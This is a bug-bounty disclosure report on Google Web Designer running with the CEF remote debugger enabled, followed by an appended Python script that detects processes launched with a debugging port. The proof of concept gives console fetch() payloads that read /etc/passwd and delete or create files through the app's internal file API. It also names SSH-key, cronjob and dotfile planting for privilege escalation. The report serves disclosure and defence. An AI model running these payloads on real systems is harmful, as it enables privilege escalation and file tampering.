CEF Debugger Enabled in Google Web Designer

Reported by: Abdel Adim `smaury` Oisfi

Google VRP

  • triaged
  • accepted
  • fixed

Reward decided: $5,000

Summary: CEF Debugger Enabled in Google Web Designer

Product: Google Web Designer

Vulnerability type: Privilege Escalation

Details

Description

Google Web Designer is built with the CEF (Chromium Embedded Framework) remote debugger enabled. This configuration exposes a local TCP port (typically randomized across executions) on which a minimal frontend and a WebSocket server are available. By connecting to it, it is possible to run arbitrary JavaScript code in the context of the target application (Google Web Designer). A general description of this class of vulnerability was very well documented by your very own Taviso here: https://github.com/taviso/cefdebug

Attack scenario

Attack Vector

As the CEF version is fairly recent, the /json/new API is not enabled and a DNS rebinding attack is not possible. The only working attack vector is therefore the local one: the attacker must already have a local shell on the victim's device as any user (which makes the issue useful for privilege escalation).

Impact

An attacker could:

  • Steal the Google account refresh token (if the victim is logged in to the Google Web Designer client).
  • Read, write, delete and list any file and folder the victim's system user has access to. This is possible because Google Web Designer implements special internal APIs that are triggered by fetching a https://ninja-shell/api/{file|directory}?method={read|create|save|delete|exists|...}&{file|path}= URL.

Proof of Concept

Requirements:

  1. Have a computer with two different system accounts (e.g. lowpriv and regularuser)

Steps to Reproduce:

  1. Install the Google Web Designer client as regularuser
  2. Open the Google Web Designer client as regularuser
  3. Log in with your Google Account
  4. Open a session as lowpriv without logging out from regularuser or closing the Google Web Designer client
  5. List the running processes (e.g. by running ps auxw) and notice that Google Web Designer is executed with the --remote-debugging-port flag, specifying a port. In the observed run the helper process command line was:

     /Volumes/Google Web Designer/Google Web Designer.app/Contents/Frameworks/Google Web Designer Helper (Renderer).app/Contents/MacOS/Google Web Designer Helper (Renderer) --type=renderer --log-file=/Users/smaury/Library/Logs/Google Web Designer_debug.log --remote-debugging-port=65423 --field-trial-handle=1718379636,3111382051732477566,9981932134914610433,131072 --enable-features=CastMediaRouteProvider --lang=en --log-file=/Users/smaury/Library/Logs/Google Web Designer_debug.log --log-severity=disable --disable-spell-checking --uncaught-exception-stack-size=20 --num-raster-threads=4 --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --shared-files --seatbelt-client=44

  6. Open a browser pointing to http://localhost:<port>, where <port> is the one observed in the previous step
  7. Click on "Google Web Designer"
  8. In the Console tab paste the following code:

     // read /etc/passwd through the application's internal file API
     fetch("https://ninja-shell/api/file?method=read&file=%2Fetc%2fpasswd").then(response => response.text()).then(data => console.log(data));

  9. Notice that the content of the file /etc/passwd is shown
  10. In the Console tab paste the following code:

     // delete /tmp/test ...
     fetch("https://ninja-shell/api/file?method=delete&file=%2Ftmp/test", {
       "headers": {
         "content-type": "application/x-www-form-urlencoded;charset=UTF-8"
       },
       "referrer": "https://prodc.webdesignerauth.withgoogle.com/?livestream=0",
       "referrerPolicy": "no-referrer-when-downgrade",
       "body": "AAAA",
       "method": "PUT",
       "mode": "cors",
       "credentials": "omit"
     });
     // ... then re-create it with the request body as its content
     fetch("https://ninja-shell/api/file?method=create&file=%2Ftmp/test", {
       "headers": {
         "content-type": "application/x-www-form-urlencoded;charset=UTF-8"
       },
       "referrer": "https://prodc.webdesignerauth.withgoogle.com/?livestream=0",
       "referrerPolicy": "no-referrer-when-downgrade",
       "body": "AAAA",
       "method": "PUT",
       "mode": "cors",
       "credentials": "omit"
     });

  11. Notice that the file /tmp/test is deleted and then re-created with AAAA as content

The file creation/edit ability is very important, as it could be used to elevate privileges from lowpriv to regularuser by adding an SSH key, a cronjob, or some code to regularuser's dotfiles (.bashrc, .bash_profile, etc.).
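A host-side check for the condition observed in step 5, added here as an example and not part of the original report or of Google Web Designer: it parses ps auxw-style output and reports every process whose command line carries the --remote-debugging-port flag, together with the account that owns it, so an administrator can detect an application running with the CEF debugger enabled. The ps sample is constructed (PIDs and install paths are made up); only the flag value mirrors the report.

```python
"""Detect processes started with the CEF/Chromium --remote-debugging-port flag."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Constructed sample of `ps auxw` output (not from the report): PIDs and paths
# are made up, the flag value is the one the report observed in step 5.
SAMPLE_PS = """\
USER         PID  %CPU %MEM COMMAND
regularuser 4312   0.3  1.2 /Applications/Google Web Designer.app/Contents/MacOS/Google Web Designer --remote-debugging-port=65423 --log-severity=disable
regularuser 4318   0.0  0.4 /Applications/Google Web Designer.app/Contents/Frameworks/Google Web Designer Helper (Renderer).app/Contents/MacOS/Google Web Designer Helper (Renderer) --type=renderer --remote-debugging-port=65423
lowpriv     5120   0.0  0.1 /usr/bin/ssh-agent
root          88   0.0  0.0 /usr/sbin/sshd
"""

# Whole-token match so e.g. --remote-debugging-pipe is not reported.
FLAG_RE = re.compile(r"(?<!\S)--remote-debugging-port(?:=(\d+))?(?!\S)")


@dataclass(frozen=True)
class Finding:
    user: str
    pid: int
    port: Optional[int]  # None when the flag is given without a value
    command: str


def find_debug_ports(ps_output: str) -> list:
    """Return one Finding per process whose command line carries the flag."""
    lines = ps_output.splitlines()
    if not lines:
        return []
    ncols = len(lines[0].split())  # the header decides how many columns there are
    findings = []
    for line in lines[1:]:
        parts = line.split(None, ncols - 1)  # keeps spaces inside COMMAND intact
        if len(parts) < ncols:
            continue
        user, pid, command = parts[0], int(parts[1]), parts[-1]
        match = FLAG_RE.search(command)
        if match:
            port = int(match.group(1)) if match.group(1) else None
            findings.append(Finding(user, pid, port, command))
    return findings


def ports_by_user(findings) -> dict:
    """Group the exposed ports by the account owning the process (the renderer
    helper inherits the flag, so several PIDs usually share one port)."""
    grouped = defaultdict(set)
    for f in findings:
        grouped[f.user].add(f.port)
    return dict(grouped)


if __name__ == "__main__":
    for f in find_debug_ports(SAMPLE_PS):
        print(f"{f.user} pid={f.pid} port={f.port}: {f.command[:60]}")
```

On a live host, feed it the output of `ps auxw` and treat any finding as a locally reachable debugger, whatever account owns the process.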